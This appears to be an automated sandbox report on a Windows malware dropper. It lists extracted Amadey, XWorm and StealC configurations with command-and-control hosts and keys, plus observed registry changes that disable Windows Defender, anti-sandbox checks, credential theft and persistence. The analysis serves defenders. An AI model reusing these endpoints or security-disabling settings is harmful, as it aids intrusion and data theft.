Analysis
-
max time kernel
87s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
27/03/2025, 04:27
Static task
static1
Behavioral task
behavioral1
Sample
bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe
Resource
win10v2004-20250314-en
General
-
Target
bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe
-
Size
1.8MB
-
MD5
d5f6e39b19e5b45d9953d4cb1401cc51
-
SHA1
c20f5112e5c6743247c3aa2939bbac098e7df551
-
SHA256
bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666
-
SHA512
b63a89ec0df2dd5c836e03d5c4f2b74acd5444499ac728eb66d9cc55d892b85819ceb10c98bb96067170fa4d0ac34cc72c3f839e8f4c1c740d7e50d27e6fb298
-
SSDEEP
24576:kUAfrVg7JIB/RwQTo1ozluw6kJ4AoZRvMfyTY/e63AlMYe/t4SHd4lU55eoyyT0O:7Af5g766QTNv6i4Zrng2lMff9Pei0
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
xworm
5.0
b.strongest.network:22394
arwpWzcFwkBy2ZX1
-
Install_directory
%AppData%
-
install_file
MsWin32tart.exe
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x000f0000000242fd-74.dat family_xworm behavioral2/memory/1044-87-0x0000000000090000-0x00000000000BE000-memory.dmp family_xworm -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/5024-904-0x0000000001000000-0x000000000144C000-memory.dmp healer behavioral2/memory/5024-905-0x0000000001000000-0x000000000144C000-memory.dmp healer behavioral2/memory/5024-1508-0x0000000001000000-0x000000000144C000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 03f1ade1d9.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 03f1ade1d9.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 03f1ade1d9.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 03f1ade1d9.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 03f1ade1d9.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 03f1ade1d9.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 03f1ade1d9.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 03f1ade1d9.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 03f1ade1d9.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications 03f1ade1d9.exe -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe -
Stealc family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 132a2d7f4d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1b9f07e8f6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 03f1ade1d9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9a02d1b43e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2468 powershell.exe 8332 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 17 IoCs
flow pid Process 313 1972 rapes.exe 339 1972 rapes.exe 355 1972 rapes.exe 27 1972 rapes.exe 27 1972 rapes.exe 27 1972 rapes.exe 27 1972 rapes.exe 27 1972 rapes.exe 27 1972 rapes.exe 27 1972 rapes.exe 307 1048 1b9f07e8f6.exe 307 1048 1b9f07e8f6.exe 307 1048 1b9f07e8f6.exe 307 1048 1b9f07e8f6.exe 307 1048 1b9f07e8f6.exe 307 1048 1b9f07e8f6.exe 354 6504 svchost.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 464 icacls.exe 840 takeown.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 8 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 1680 chrome.exe 1052 chrome.exe 5956 msedge.exe 6428 msedge.exe 6412 msedge.exe 2060 chrome.exe 3588 chrome.exe 3276 chrome.exe -
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 132a2d7f4d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 132a2d7f4d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 03f1ade1d9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9a02d1b43e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1b9f07e8f6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1b9f07e8f6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 03f1ade1d9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9a02d1b43e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation apple.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation 22.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation 22.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation FjbTOQC.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe -
Deletes itself 1 IoCs
pid Process 624 w32tm.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MsWin32tart.lnk FjbTOQC.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MsWin32tart.lnk FjbTOQC.exe -
Executes dropped EXE 19 IoCs
pid Process 1972 rapes.exe 900 apple.exe 3668 22.exe 3696 22.exe 1824 EPTwCQd.exe 1044 FjbTOQC.exe 2200 132a2d7f4d.exe 1048 1b9f07e8f6.exe 672 144409b916.exe 5024 03f1ade1d9.exe 3008 9a02d1b43e.exe 1088 EPTwCQd.exe 4696 rapes.exe 4916 MsWin32tart.exe 6372 oalJJxv.exe 3948 7b35p_003.exe 5580 tzutil.exe 624 w32tm.exe 13168 kZZeUXM.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine 132a2d7f4d.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine 1b9f07e8f6.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine 03f1ade1d9.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine 9a02d1b43e.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine rapes.exe -
Loads dropped DLL 2 IoCs
pid Process 1048 1b9f07e8f6.exe 1048 1b9f07e8f6.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 840 takeown.exe 464 icacls.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 03f1ade1d9.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 03f1ade1d9.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MsWin32tart = "C:\\Users\\Admin\\AppData\\Roaming\\MsWin32tart.exe" FjbTOQC.exe Set value (str) \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\132a2d7f4d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10346890101\\132a2d7f4d.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1b9f07e8f6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10346900101\\1b9f07e8f6.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\144409b916.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10346910101\\144409b916.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\03f1ade1d9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10346920101\\03f1ade1d9.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 3 IoCs
description ioc Process File opened for modification C:\Users\Public\Documents\desktop.ini firefox.exe File opened for modification C:\Users\Admin\Documents\desktop.ini firefox.exe File opened for modification C:\Users\Public\desktop.ini firefox.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x001400000002418e-181.dat autoit_exe behavioral2/files/0x001600000002418e-36005.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 8780 tasklist.exe 9204 tasklist.exe 10616 tasklist.exe 10720 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 2460 bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe 1972 rapes.exe 2200 132a2d7f4d.exe 1048 1b9f07e8f6.exe 5024 03f1ade1d9.exe 3008 9a02d1b43e.exe 4696 rapes.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1824 set thread context of 4236 1824 EPTwCQd.exe 169 PID 1088 set thread context of 6184 1088 EPTwCQd.exe 243 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1608 sc.exe 4980 sc.exe 916 sc.exe 1336 sc.exe 456 sc.exe 400 sc.exe 3616 sc.exe 3252 sc.exe 3020 sc.exe 5652 sc.exe 4956 sc.exe 2648 sc.exe 1504 sc.exe 3232 sc.exe 3772 sc.exe 2484 sc.exe 5104 sc.exe 5216 sc.exe 5068 sc.exe 5444 sc.exe 2500 sc.exe 3388 sc.exe 3684 sc.exe 5816 sc.exe 3256 sc.exe 5376 sc.exe 3660 sc.exe 5916 sc.exe 3404 sc.exe 5248 sc.exe 4908 sc.exe 1132 sc.exe 1468 sc.exe 1008 sc.exe 2056 sc.exe 5884 sc.exe 2276 sc.exe 1816 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 22 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 144409b916.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 03f1ade1d9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kZZeUXM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 144409b916.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 144409b916.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9a02d1b43e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7b35p_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 22.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 22.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1b9f07e8f6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language oalJJxv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 132a2d7f4d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
Checks processor information in registry 2 TTPs 24 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 1b9f07e8f6.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 1b9f07e8f6.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 5192 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Kills process with taskkill 5 IoCs
pid Process 2224 taskkill.exe 3496 taskkill.exe 2936 taskkill.exe 3932 taskkill.exe 1088 taskkill.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133875232620298212" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-308834014-1004923324-1191300197-1000\{135BC9A3-F7C3-4B2B-B151-B8EC8FBD33C3} msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2288 schtasks.exe 8220 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1044 FjbTOQC.exe -
Suspicious behavior: EnumeratesProcesses 52 IoCs
